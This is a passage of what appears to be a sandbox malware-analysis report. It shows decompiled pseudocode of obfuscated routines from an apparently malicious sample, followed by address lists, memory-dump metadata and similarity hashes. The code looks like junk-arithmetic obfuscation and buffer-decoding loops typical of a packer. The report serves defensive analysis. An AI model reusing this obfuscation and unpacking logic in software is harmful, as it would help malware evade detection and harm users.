                                                                                                                                                                                                                                                                            					_t311 = _t842 + 0x5c; // 0x1
                                                                                                                                                                                                                                                                            					_t843 = _a28;
                                                                                                                                                                                                                                                                            					_t386 = _a28;
                                                                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t386 + 0xbadc39)) - ( *(_t383 + 0xbadbe5) &  *_t311) -  *((intOrPtr*)(_t843 + 0x8c));
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t386 + 0xbadc39)) <= ( *(_t383 + 0xbadbe5) &  *_t311) -  *((intOrPtr*)(_t843 + 0x8c))) {
                                                                                                                                                                                                                                                                            						_t698 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t371 = _t698 + 0x64; // 0x658f6
                                                                                                                                                                                                                                                                            						_t547 = ( *_t371 |  *(_a28 + 0x80)) + _v76;
                                                                                                                                                                                                                                                                            						__eflags = _t547;
                                                                                                                                                                                                                                                                            						_v80 = _t547;
                                                                                                                                                                                                                                                                            						__imp__GetCurrentActCtx(_v80);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t390 = _a28;
                                                                                                                                                                                                                                                                            						_t702 = _a28;
                                                                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t702 + 0xe0)) - (_v36 ^ _v32) *  *(_t390 + 0xbadc65);
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t702 + 0xe0)) <= (_v36 ^ _v32) *  *(_t390 + 0xbadc65)) {
                                                                                                                                                                                                                                                                            							 *(_a28 + 0x30) = (_v36 ^ 0x000024c7) - _v32 +  *(_a28 + 0x30);
                                                                                                                                                                                                                                                                            							_v44 =  *(_a28 + 0x120) *  *(_a28 + 0x30);
                                                                                                                                                                                                                                                                            							CloseHandle(_v44);
                                                                                                                                                                                                                                                                            							 *_a28 =  *_a28 -  *((intOrPtr*)(_a28 + 0xac)) + 0x253b;
                                                                                                                                                                                                                                                                            							_v8 = _v8 -  *((intOrPtr*)(_a28 + 0xbadc19)) -  *0x40d440;
                                                                                                                                                                                                                                                                            							_v68 =  *(_a28 + 0xbadbd5) ^  *0x00FBAFA1 | _v8;
                                                                                                                                                                                                                                                                            							_v64 = ( *(_a28 + 0x5c) | 0x00002674) - _v40;
                                                                                                                                                                                                                                                                            							_v60 = _v48 ^ 0x00002674;
                                                                                                                                                                                                                                                                            							_t562 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_v56 = _t562;
                                                                                                                                                                                                                                                                            							_t718 = _v32 ^ _v32 ^ _v8;
                                                                                                                                                                                                                                                                            							__eflags = _t718;
                                                                                                                                                                                                                                                                            							_v52 = _t718;
                                                                                                                                                                                                                                                                            							_v72 = E003885E0(_v68, _v64, _v60, _v56, _v52);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = 0;
                                                                                                                                                                                                                                                                            					while(_v24 < 0x794) {
                                                                                                                                                                                                                                                                            						_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a28 + 0xa8)) + _v24 * 4));
                                                                                                                                                                                                                                                                            						_t495 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t28 = _t495 + 0x5c; // 0x1
                                                                                                                                                                                                                                                                            						_t654 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t654 + 0x5c) =  *_t28 *  *(_a28 + 0x14);
                                                                                                                                                                                                                                                                            						_v12 = _v12 *  *(_a28 + 0x7c);
                                                                                                                                                                                                                                                                            						_t811 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t37 = _t811 + 0x9c; // 0x4b18c
                                                                                                                                                                                                                                                                            						_t812 =  *0x40d474; // 0x1212000
                                                                                                                                                                                                                                                                            						 *((char*)(_t812 +  *_t37)) = _v12 >> 0x10;
                                                                                                                                                                                                                                                                            						_t501 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t39 = _t501 + 0x9c; // 0x4b18c
                                                                                                                                                                                                                                                                            						_t813 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t813 + 0x9c)) =  *_t39 + 1;
                                                                                                                                                                                                                                                                            						_t815 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t48 =  *(_a28 + 0xe4) + 0x1dfde0; // 0x1dfde0
                                                                                                                                                                                                                                                                            						 *(_a28 + 0xe4) =  *((intOrPtr*)(_t815 + 0x8c)) -  *_a28 + _t48;
                                                                                                                                                                                                                                                                            						 *(_a28 + 0xbadbb1) =  *(_a28 + 0x6c) ^  *(_a28 + 0x64) ^ 0x000658e7 ^  *(_a28 + 0xbadbb1);
                                                                                                                                                                                                                                                                            						 *((char*)( *((intOrPtr*)(_a28 + 0xcc)) +  *((intOrPtr*)(_a28 + 0x9c)))) = _v12 >> 8;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_a28 + 0x9c)) =  *((intOrPtr*)(_a28 + 0x9c)) + 1;
                                                                                                                                                                                                                                                                            						 *((char*)( *((intOrPtr*)(_a28 + 0xcc)) +  *((intOrPtr*)(_a28 + 0x9c)))) = _v12;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_a28 + 0x9c)) =  *((intOrPtr*)(_a28 + 0x9c)) + 1;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_a28 + 0x8c)) =  *((intOrPtr*)(_a28 + 0x8c)) -  *((intOrPtr*)(_a28 + 0xc8)) -  *0x0040D3BC - 0x38f7708c;
                                                                                                                                                                                                                                                                            						 *(_a28 + 0xbadc31) =  *((intOrPtr*)(_a28 + 0xe0)) - 0x00000006 ^  *(_a28 + 0xbadc31);
                                                                                                                                                                                                                                                                            						_t527 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t849 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t100 = _t527 + 0xd0; // 0x33baa
                                                                                                                                                                                                                                                                            						 *0x0040D454 = ( *_t100 -  *((intOrPtr*)(_t849 + 0x14)) ^ 0x00033ba8) *  *0x0040D454;
                                                                                                                                                                                                                                                                            						_t837 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t533 =  *0x40d470; // 0x38f7708d
                                                                                                                                                                                                                                                                            						 *(_a28 + 0x10c) = (_t533 -  *_t837 - 0x38d972ac) *  *(_a28 + 0x10c);
                                                                                                                                                                                                                                                                            						_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t566 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t566 + 0x7c)) = ( *(_a28 + 0x6c) ^  *(_a28 + 0xf4)) + 0xbab3;
                                                                                                                                                                                                                                                                            					_t722 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t117 = _t722 + 0x7c; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                            					_t567 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *(_t567 + 0x7c) =  *_t117 ^ 0x000be7bc;
                                                                                                                                                                                                                                                                            					_v8 = _v8 ^ 0x00000111;
                                                                                                                                                                                                                                                                            					 *(_a28 + 0x7c) =  *0x0040D454 - 0x0008c98c ^  *(_a28 + 0x7c);
                                                                                                                                                                                                                                                                            					_t729 =  *0x40d424; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                            					 *0x40d424 = _t729 - ( *0x0040D460 ^ 0x3b13c5ef);
                                                                                                                                                                                                                                                                            					__eflags =  *(_a28 + 0x30) -  *0x40d404; // 0x1
                                                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                                                            						_t575 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t133 = _t575 + 0x30; // 0x0
                                                                                                                                                                                                                                                                            						_t426 =  *((intOrPtr*)(_a28 + 0xb8)) -  *0x0040D3F4 - 0x0000c490 |  *_t133;
                                                                                                                                                                                                                                                                            						__eflags = _t426;
                                                                                                                                                                                                                                                                            						_t733 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t733 + 0x30) = _t426;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *0x40d450 = 0x38d418;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						__eflags = _v28 - 0xc6c;
                                                                                                                                                                                                                                                                            						if(_v28 >= 0xc6c) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t768 =  *0x40d450; // 0x38d418
                                                                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t768 + _v28 * 4));
                                                                                                                                                                                                                                                                            						_t457 =  *((intOrPtr*)(_a28 + 0xbadbe5));
                                                                                                                                                                                                                                                                            						_t611 =  *0x40d49c; // 0x0
                                                                                                                                                                                                                                                                            						_t147 = _t457 + 0x6e28ee78; // 0x6e28ee78
                                                                                                                                                                                                                                                                            						 *0x40d49c = _t611 + _t147;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_a28 + 0x98)) =  *((intOrPtr*)(_a28 + 0x98)) -  *(_a28 + 0xe4) +  *0x00FBAF8D + 0x6e28ee16;
                                                                                                                                                                                                                                                                            						_t615 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t159 = _t615 + 0x7c; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                            						_v16 = _v16 *  *_t159;
                                                                                                                                                                                                                                                                            						_t617 =  *0x40d474; // 0x1212000
                                                                                                                                                                                                                                                                            						 *((char*)(_t617 +  *((intOrPtr*)(_a28 + 0x9c)))) = _v16 >> 0x10;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_a28 + 0x9c)) =  *((intOrPtr*)(_a28 + 0x9c)) + 1;
                                                                                                                                                                                                                                                                            						_t467 =  *0x40d444; // 0x4b18c
                                                                                                                                                                                                                                                                            						 *((char*)( *((intOrPtr*)(_a28 + 0xcc)) + _t467)) = _v16 >> 8;
                                                                                                                                                                                                                                                                            						_t620 =  *0x40d444; // 0x4b18c
                                                                                                                                                                                                                                                                            						 *0x40d444 = _t620 + 1;
                                                                                                                                                                                                                                                                            						_t622 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t175 = _t622 + 0xcc; // 0x1212000
                                                                                                                                                                                                                                                                            						 *((char*)( *_t175 +  *((intOrPtr*)(_a28 + 0x9c)))) = _v16;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_a28 + 0x9c)) =  *((intOrPtr*)(_a28 + 0x9c)) + 1;
                                                                                                                                                                                                                                                                            						_t626 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t627 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t187 =  *((intOrPtr*)(_t627 + 0xb8)) - 0x141358; // 0x0
                                                                                                                                                                                                                                                                            						_t789 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t789 + 0xb8)) =  *((intOrPtr*)(_t626 + 0xac)) + _t187;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_a28 + 0x98)) =  *((intOrPtr*)(_a28 + 0x98)) -  *((intOrPtr*)(_a28 + 0xe0)) - 6;
                                                                                                                                                                                                                                                                            						_t632 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_a28 + 0x64) =  *(_a28 + 0x64) -  *((intOrPtr*)(_t632 + 0x4c)) -  *(_a28 + 0x5c) + 1;
                                                                                                                                                                                                                                                                            						_t483 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t638 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t638 + 0xb8)) =  *(_a28 + 0x80) -  *0x40d4c8 +  *((intOrPtr*)(_t483 + 0xb8)) + 0x2fa2a;
                                                                                                                                                                                                                                                                            						 *(_a28 + 0x6c) =  *(_a28 + 0x6c) -  *((intOrPtr*)(_a28 + 0x8c)) +  *0x0040D460;
                                                                                                                                                                                                                                                                            						 *(_a28 + 0x10c) = ( *((intOrPtr*)(_a28 + 0xbadbe5)) -  *0x0040D48C ^ 0x91d71126) +  *(_a28 + 0x10c);
                                                                                                                                                                                                                                                                            						_t492 = _v28 + 1;
                                                                                                                                                                                                                                                                            						__eflags = _t492;
                                                                                                                                                                                                                                                                            						_v28 = _t492;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t427 = _a28;
                                                                                                                                                                                                                                                                            					_t577 = _a28;
                                                                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t427 + 0xe4)) -  *((intOrPtr*)(_t577 + 0xe0));
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t427 + 0xe4)) <=  *((intOrPtr*)(_t577 + 0xe0))) {
                                                                                                                                                                                                                                                                            						_t739 =  *((intOrPtr*)(_a28 + 0x28)) -  *((intOrPtr*)(_a28 + 0x98)) |  *(_a28 + 0x30);
                                                                                                                                                                                                                                                                            						__eflags = _t739;
                                                                                                                                                                                                                                                                            						 *(_a28 + 0x30) = _t739;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t455 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t455 + 0x114)) = 0x40d3a8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						__eflags = _v20 - 0x4ae3;
                                                                                                                                                                                                                                                                            						if(_v20 >= 0x4ae3) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t583 =  *0x40d3a8; // 0x1dfde0
                                                                                                                                                                                                                                                                            						 *0x40d3a8 = _t583 -  *(_a28 + 0xbadbb1) -  *((intOrPtr*)(0x40d3f4));
                                                                                                                                                                                                                                                                            						_t742 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t255 = _t742 + 0xe0; // 0x6
                                                                                                                                                                                                                                                                            						 *(_a28 + 0xe4) =  *_t255 +  *0x00FBAFD9 - 0x00000006 ^  *(_a28 + 0xe4);
                                                                                                                                                                                                                                                                            						_t592 =  *0x40d47c; // 0x1212000
                                                                                                                                                                                                                                                                            						 *(_t592 + _v20 * 4) =  *( *((intOrPtr*)(_a28 + 0xd4)) + _v20 * 4) ^  *(_a28 + 0xa0);
                                                                                                                                                                                                                                                                            						 *0x0040D434 =  *((intOrPtr*)(0x40d434)) +  *(_a28 + 0xf4);
                                                                                                                                                                                                                                                                            						 *(_a28 + 0xa0) =  *(_a28 + 0xa0) +  *((intOrPtr*)(_a28 + 0xd8));
                                                                                                                                                                                                                                                                            						_t844 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_a28 + 0xbadc31) = ( *((intOrPtr*)(_t844 + 0xbadbb1)) +  *((intOrPtr*)(0x40d434)) ^ 0x00000001) *  *(_a28 + 0xbadc31);
                                                                                                                                                                                                                                                                            						_t448 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t603 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t299 = _t603 + 0xc8; // 0x38f7708d
                                                                                                                                                                                                                                                                            						_t604 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t604 + 0xc8)) =  *_t299 -  *((intOrPtr*)(_t448 + 0x8c)) +  *((intOrPtr*)(_a28 + 0xb8));
                                                                                                                                                                                                                                                                            						 *(_a28 + 0xbadc31) =  *(_a28 + 0x120) ^ 0x0002fa2a ^  *(_a28 + 0xbadc31);
                                                                                                                                                                                                                                                                            						_t767 = _v20 + 1;
                                                                                                                                                                                                                                                                            						__eflags = _t767;
                                                                                                                                                                                                                                                                            						_v20 = _t767;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t389 = _v40 - 0x1c0;
                                                                                                                                                                                                                                                                            				__eflags = _t389;
                                                                                                                                                                                                                                                                            				return _t389;
                                                                                                                                                                                                                                                                            			}














































































                                                                                                                                                                                                                                                                            0x0038755f
                                                                                                                                                                                                                                                                            0x00387568
                                                                                                                                                                                                                                                                            0x00387574
                                                                                                                                                                                                                                                                            0x0038757f
                                                                                                                                                                                                                                                                            0x0038758b
                                                                                                                                                                                                                                                                            0x00387597
                                                                                                                                                                                                                                                                            0x003875a2
                                                                                                                                                                                                                                                                            0x003875b1
                                                                                                                                                                                                                                                                            0x00387d77
                                                                                                                                                                                                                                                                            0x00387d7c
                                                                                                                                                                                                                                                                            0x00387d86
                                                                                                                                                                                                                                                                            0x00387d91
                                                                                                                                                                                                                                                                            0x00387d9b
                                                                                                                                                                                                                                                                            0x00387d9e
                                                                                                                                                                                                                                                                            0x00387da5
                                                                                                                                                                                                                                                                            0x00387ebc
                                                                                                                                                                                                                                                                            0x00387ec5
                                                                                                                                                                                                                                                                            0x00387ece
                                                                                                                                                                                                                                                                            0x00387ece
                                                                                                                                                                                                                                                                            0x00387ed1
                                                                                                                                                                                                                                                                            0x00387ed8
                                                                                                                                                                                                                                                                            0x00387dab
                                                                                                                                                                                                                                                                            0x00387db9
                                                                                                                                                                                                                                                                            0x00387dc4
                                                                                                                                                                                                                                                                            0x00387dc7
                                                                                                                                                                                                                                                                            0x00387dcd
                                                                                                                                                                                                                                                                            0x00387de7
                                                                                                                                                                                                                                                                            0x00387dfa
                                                                                                                                                                                                                                                                            0x00387e01
                                                                                                                                                                                                                                                                            0x00387e29
                                                                                                                                                                                                                                                                            0x00387e44
                                                                                                                                                                                                                                                                            0x00387e66
                                                                                                                                                                                                                                                                            0x00387e78
                                                                                                                                                                                                                                                                            0x00387e83
                                                                                                                                                                                                                                                                            0x00387e86
                                                                                                                                                                                                                                                                            0x00387e8c
                                                                                                                                                                                                                                                                            0x00387e95
                                                                                                                                                                                                                                                                            0x00387e95
                                                                                                                                                                                                                                                                            0x00387e98
                                                                                                                                                                                                                                                                            0x00387eb7
                                                                                                                                                                                                                                                                            0x00387eb7
                                                                                                                                                                                                                                                                            0x00387eba
                                                                                                                                                                                                                                                                            0x003875b7
                                                                                                                                                                                                                                                                            0x003875b7
                                                                                                                                                                                                                                                                            0x003875c9
                                                                                                                                                                                                                                                                            0x003875e5
                                                                                                                                                                                                                                                                            0x003875f0
                                                                                                                                                                                                                                                                            0x003875f8
                                                                                                                                                                                                                                                                            0x00387600
                                                                                                                                                                                                                                                                            0x00387606
                                                                                                                                                                                                                                                                            0x00387613
                                                                                                                                                                                                                                                                            0x0038761c
                                                                                                                                                                                                                                                                            0x00387622
                                                                                                                                                                                                                                                                            0x00387628
                                                                                                                                                                                                                                                                            0x0038762e
                                                                                                                                                                                                                                                                            0x00387631
                                                                                                                                                                                                                                                                            0x00387636
                                                                                                                                                                                                                                                                            0x0038763f
                                                                                                                                                                                                                                                                            0x00387645
                                                                                                                                                                                                                                                                            0x0038765b
                                                                                                                                                                                                                                                                            0x00387677
                                                                                                                                                                                                                                                                            0x00387689
                                                                                                                                                                                                                                                                            0x003876c2
                                                                                                                                                                                                                                                                            0x003876de
                                                                                                                                                                                                                                                                            0x003876f0
                                                                                                                                                                                                                                                                            0x0038770b
                                                                                                                                                                                                                                                                            0x0038771d
                                                                                                                                                                                                                                                                            0x0038775f
                                                                                                                                                                                                                                                                            0x0038778f
                                                                                                                                                                                                                                                                            0x003877a6
                                                                                                                                                                                                                                                                            0x003877ab
                                                                                                                                                                                                                                                                            0x003877b1
                                                                                                                                                                                                                                                                            0x003877cf
                                                                                                                                                                                                                                                                            0x003877dd
                                                                                                                                                                                                                                                                            0x003877e3
                                                                                                                                                                                                                                                                            0x00387805
                                                                                                                                                                                                                                                                            0x003875c6
                                                                                                                                                                                                                                                                            0x003875c6
                                                                                                                                                                                                                                                                            0x0038782e
                                                                                                                                                                                                                                                                            0x00387834
                                                                                                                                                                                                                                                                            0x00387837
                                                                                                                                                                                                                                                                            0x0038783d
                                                                                                                                                                                                                                                                            0x00387845
                                                                                                                                                                                                                                                                            0x0038784b
                                                                                                                                                                                                                                                                            0x00387857
                                                                                                                                                                                                                                                                            0x00387877
                                                                                                                                                                                                                                                                            0x0038788e
                                                                                                                                                                                                                                                                            0x00387896
                                                                                                                                                                                                                                                                            0x003878a2
                                                                                                                                                                                                                                                                            0x003878a8
                                                                                                                                                                                                                                                                            0x003878db
                                                                                                                                                                                                                                                                            0x003878e1
                                                                                                                                                                                                                                                                            0x003878e1
                                                                                                                                                                                                                                                                            0x003878e1
                                                                                                                                                                                                                                                                            0x003878e4
                                                                                                                                                                                                                                                                            0x003878ea
                                                                                                                                                                                                                                                                            0x003878aa
                                                                                                                                                                                                                                                                            0x003878aa
                                                                                                                                                                                                                                                                            0x003878aa
                                                                                                                                                                                                                                                                            0x003878ed
                                                                                                                                                                                                                                                                            0x003878ff
                                                                                                                                                                                                                                                                            0x003878ff
                                                                                                                                                                                                                                                                            0x00387906
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0038790f
                                                                                                                                                                                                                                                                            0x00387918
                                                                                                                                                                                                                                                                            0x00387925
                                                                                                                                                                                                                                                                            0x00387929
                                                                                                                                                                                                                                                                            0x0038792f
                                                                                                                                                                                                                                                                            0x00387936
                                                                                                                                                                                                                                                                            0x00387970
                                                                                                                                                                                                                                                                            0x00387976
                                                                                                                                                                                                                                                                            0x0038797f
                                                                                                                                                                                                                                                                            0x00387983
                                                                                                                                                                                                                                                                            0x00387995
                                                                                                                                                                                                                                                                            0x0038799b
                                                                                                                                                                                                                                                                            0x003879ad
                                                                                                                                                                                                                                                                            0x003879c2
                                                                                                                                                                                                                                                                            0x003879c7
                                                                                                                                                                                                                                                                            0x003879ca
                                                                                                                                                                                                                                                                            0x003879d3
                                                                                                                                                                                                                                                                            0x003879e2
                                                                                                                                                                                                                                                                            0x003879e8
                                                                                                                                                                                                                                                                            0x003879f1
                                                                                                                                                                                                                                                                            0x00387a03
                                                                                                                                                                                                                                                                            0x00387a19
                                                                                                                                                                                                                                                                            0x00387a26
                                                                                                                                                                                                                                                                            0x00387a33
                                                                                                                                                                                                                                                                            0x00387a42
                                                                                                                                                                                                                                                                            0x00387a48
                                                                                                                                                                                                                                                                            0x00387a69
                                                                                                                                                                                                                                                                            0x00387a77
                                                                                                                                                                                                                                                                            0x00387a95
                                                                                                                                                                                                                                                                            0x00387aaf
                                                                                                                                                                                                                                                                            0x00387aca
                                                                                                                                                                                                                                                                            0x00387ad0
                                                                                                                                                                                                                                                                            0x00387b13
                                                                                                                                                                                                                                                                            0x00387b56
                                                                                                                                                                                                                                                                            0x003878f9
                                                                                                                                                                                                                                                                            0x003878f9
                                                                                                                                                                                                                                                                            0x003878fc
                                                                                                                                                                                                                                                                            0x003878fc
                                                                                                                                                                                                                                                                            0x00387b6a
                                                                                                                                                                                                                                                                            0x00387b6d
                                                                                                                                                                                                                                                                            0x00387b77
                                                                                                                                                                                                                                                                            0x00387b7d
                                                                                                                                                                                                                                                                            0x00387bab
                                                                                                                                                                                                                                                                            0x00387bab
                                                                                                                                                                                                                                                                            0x00387bb1
                                                                                                                                                                                                                                                                            0x00387b7f
                                                                                                                                                                                                                                                                            0x00387b7f
                                                                                                                                                                                                                                                                            0x00387b84
                                                                                                                                                                                                                                                                            0x00387b84
                                                                                                                                                                                                                                                                            0x00387bb4
                                                                                                                                                                                                                                                                            0x00387bc6
                                                                                                                                                                                                                                                                            0x00387bc6
                                                                                                                                                                                                                                                                            0x00387bcd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00387bef
                                                                                                                                                                                                                                                                            0x00387bf7
                                                                                                                                                                                                                                                                            0x00387c0d
                                                                                                                                                                                                                                                                            0x00387c13
                                                                                                                                                                                                                                                                            0x00387c38
                                                                                                                                                                                                                                                                            0x00387c5a
                                                                                                                                                                                                                                                                            0x00387c60
                                                                                                                                                                                                                                                                            0x00387c82
                                                                                                                                                                                                                                                                            0x00387c9d
                                                                                                                                                                                                                                                                            0x00387cba
                                                                                                                                                                                                                                                                            0x00387ce3
                                                                                                                                                                                                                                                                            0x00387cfa
                                                                                                                                                                                                                                                                            0x00387d10
                                                                                                                                                                                                                                                                            0x00387d16
                                                                                                                                                                                                                                                                            0x00387d1e
                                                                                                                                                                                                                                                                            0x00387d24
                                                                                                                                                                                                                                                                            0x00387d56
                                                                                                                                                                                                                                                                            0x00387bc0
                                                                                                                                                                                                                                                                            0x00387bc0
                                                                                                                                                                                                                                                                            0x00387bc3
                                                                                                                                                                                                                                                                            0x00387bc3
                                                                                                                                                                                                                                                                            0x00387d62
                                                                                                                                                                                                                                                                            0x00387ee1
                                                                                                                                                                                                                                                                            0x00387ee1
                                                                                                                                                                                                                                                                            0x00387eea

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID: J
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-2788708132
                                                                                                                                                                                                                                                                            • Opcode ID: 322ecffa2e2ca854dcea9504d5998e59c6136c70b907d18049c0189e50a3185c
                                                                                                                                                                                                                                                                            • Instruction ID: 74e212f17f35204c076f33e626ecdc34d1c010a797d12e9c7cfc728084552623
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 322ecffa2e2ca854dcea9504d5998e59c6136c70b907d18049c0189e50a3185c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A062FB74A00149CFD708CF58C994BA9B7F2FB8C308F5582B9D949AB796C635E806CF84
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                                                                            			E00385750() {
                                                                                                                                                                                                                                                                            				signed int _t353;
                                                                                                                                                                                                                                                                            				signed int _t357;
                                                                                                                                                                                                                                                                            				intOrPtr _t374;
                                                                                                                                                                                                                                                                            				intOrPtr _t383;
                                                                                                                                                                                                                                                                            				signed int _t394;
                                                                                                                                                                                                                                                                            				intOrPtr _t416;
                                                                                                                                                                                                                                                                            				intOrPtr _t428;
                                                                                                                                                                                                                                                                            				intOrPtr _t436;
                                                                                                                                                                                                                                                                            				intOrPtr _t437;
                                                                                                                                                                                                                                                                            				intOrPtr _t449;
                                                                                                                                                                                                                                                                            				intOrPtr _t452;
                                                                                                                                                                                                                                                                            				intOrPtr _t461;
                                                                                                                                                                                                                                                                            				intOrPtr _t468;
                                                                                                                                                                                                                                                                            				signed int _t471;
                                                                                                                                                                                                                                                                            				intOrPtr _t501;
                                                                                                                                                                                                                                                                            				intOrPtr _t505;
                                                                                                                                                                                                                                                                            				intOrPtr _t548;
                                                                                                                                                                                                                                                                            				intOrPtr _t552;
                                                                                                                                                                                                                                                                            				intOrPtr _t562;
                                                                                                                                                                                                                                                                            				intOrPtr _t573;
                                                                                                                                                                                                                                                                            				intOrPtr _t574;
                                                                                                                                                                                                                                                                            				signed int _t583;
                                                                                                                                                                                                                                                                            				intOrPtr _t587;
                                                                                                                                                                                                                                                                            				signed int _t592;
                                                                                                                                                                                                                                                                            				intOrPtr _t593;
                                                                                                                                                                                                                                                                            				intOrPtr _t638;
                                                                                                                                                                                                                                                                            				intOrPtr _t640;
                                                                                                                                                                                                                                                                            				intOrPtr _t643;
                                                                                                                                                                                                                                                                            				intOrPtr _t653;
                                                                                                                                                                                                                                                                            				signed int _t662;
                                                                                                                                                                                                                                                                            				intOrPtr _t664;
                                                                                                                                                                                                                                                                            				intOrPtr _t665;
                                                                                                                                                                                                                                                                            				intOrPtr _t676;
                                                                                                                                                                                                                                                                            				intOrPtr _t677;
                                                                                                                                                                                                                                                                            				signed int* _t700;
                                                                                                                                                                                                                                                                            				void* _t702;
                                                                                                                                                                                                                                                                            
